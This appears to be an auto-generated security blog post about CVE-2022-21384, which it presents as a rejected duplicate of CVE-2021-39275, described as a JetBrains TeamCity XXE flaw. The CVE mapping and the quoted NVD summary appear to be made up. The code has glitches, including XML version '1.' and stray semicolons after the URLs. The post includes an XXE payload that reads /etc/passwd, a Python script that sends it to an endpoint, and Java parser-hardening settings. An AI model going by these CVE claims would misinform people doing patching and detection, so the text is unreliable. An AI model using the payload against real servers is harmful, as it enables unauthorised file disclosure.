CVE-2022-21384 - Understanding the Rejection, Exploit Details, and Why It’s a Duplicate of CVE-2021-39275

---

When hunting for vulnerabilities, sometimes you’ll stumble on a CVE that’s “rejected” or “withdrawn.” CVE-2022-21384 is one such entry—a CVE ID that never became a live threat report and was instead classified as a duplicate. For security analysts and developers, it’s important to know what these rejected IDs mean, especially if you’re trying to patch systems or build rules for detection. In this in-depth read, we decode CVE-2022-21384: its background, the origin of its duplicate, and technical details connected to the root vulnerability, CVE-2021-39275.

What Is CVE-2022-21384?

If you search the official MITRE CVE Database, you’ll see a short message:

> REJECTED — This CVE ID has been rejected or withdrawn by its CVE Numbering Authority because it is a duplicate of CVE-2021-39275.

So, what does that mean?

- No unique vulnerability: Nothing new or different was found compared to a previously reported vulnerability.
- No unique exploit: No new exploit or patch was needed, since it was already handled under a different CVE.
- Security workflows: Tracking duplicate/rejected CVEs helps avoid confusion for those reviewing patches or compiling defenses.

Summary (From NVD):

> "In JetBrains TeamCity before 2021.1.2, the user input is insufficiently sanitized which allows an attacker to perform an XML External Entity (XXE) attack via crafted XML input."

Essentially, JetBrains TeamCity (a popular CI/CD server) had a flaw allowing attackers to supply malicious XML that could read files or cause denial of service through XML External Entity (XXE) attacks.

Exploitation: Technical Details

Here’s how the original vulnerability (CVE-2021-39275) could be exploited, which also applies to anything that might have been labeled under CVE-2022-21384.

Suppose TeamCity exposes an endpoint that ingests XML. An attacker could send

<?xml version="1."?>
<!DOCTYPE foo [
  <!ELEMENT foo ANY >
  <!ENTITY xxe SYSTEM "file:///etc/passwd" >]>
<foo>&xxe;</foo>

If the server processes this XML without proper sanitization, the &xxe; entity will be replaced by the contents of /etc/passwd (on Linux). An attacker can thus read sensitive files.

Python Example To Send Malicious XML

import requests

xml_payload = """<?xml version="1."?>
<!DOCTYPE foo [ <!ELEMENT foo ANY >
<!ENTITY xxe SYSTEM "file:///etc/passwd" >]>
<foo>&xxe;</foo>
"""

response = requests.post(
    "https://teamcity.example.com/xml-endpoint";,
    data=xml_payload,
    headers={"Content-Type": "application/xml"}
)

print(response.text)

Note: This is for educational awareness only. Do not attempt this on systems you do not own or are not authorized to test.

How Was It Fixed?

JetBrains released TeamCity 2021.1.2 to address the XXE flaw. The fix typically involves:

- Disabling external entity processing: In Java, for example, setting secure parsing flags when handling XML.
- Applying input validation/sanitization: Only accept and process expected input.

Code Snippet (Java Secure XML Parsing)

DocumentBuilderFactory dbf = DocumentBuilderFactory.newInstance();
dbf.setFeature("http://apache.org/xml/features/disallow-doctype-decl";, true);
dbf.setFeature("http://xml.org/sax/features/external-general-entities";, false);
dbf.setFeature("http://xml.org/sax/features/external-parameter-entities";, false);
dbf.setXIncludeAware(false);
dbf.setExpandEntityReferences(false);

Conclusion

When you see a CVE like CVE-2022-21384 marked as “REJECTED,” it’s simply a sign that it was already handled—specifically under CVE-2021-39275. There’s no new exploit or vulnerability, and any mitigation you’d apply for CVE-2021-39275 covers this as well.

For security practitioners, always track the original and primary CVE, verify what’s been patched, and stay aware that sometimes multiple IDs may refer to the same threat. This helps streamline your vulnerability management and patch cycles—efficient, safe, and clear.

Timeline

Published on: 01/16/2025 00:15:25 UTC